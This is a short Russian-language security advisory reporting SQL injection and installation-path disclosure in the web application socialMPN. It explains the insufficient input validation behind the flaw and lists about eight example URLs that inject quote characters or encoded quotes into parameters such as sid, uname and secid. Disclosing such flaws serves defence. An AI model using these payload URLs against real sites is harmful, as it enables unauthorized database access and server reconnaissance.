Программа: socialMPN 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и определить установочную директорию приложения на сервере.
Уязвимость существует из-за недостаточной проверки входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения и получить данные об установочной директории приложения на сервере. 

Пример:

http://[target]/article.php?sid=%27 

http://[target]/use r.php?uname=’ &pass=1&op=login

http://[target]/viewforum.php? forum=43&siteid=%2527

http://[target]/newtopic.php? username=’&password=

http://[target]/sections.php? op=listarticles&secid=%27

http://[target]/sections.php? op=listarticles&artid=%2527

http://[target]/index.php?siteid=’ &op=show&aftersid=380

http://[target]/friend .php?sid= %2527&yname=1&ymail=1 & fname=1&fmail=1&op=SendStory



Оставить мнение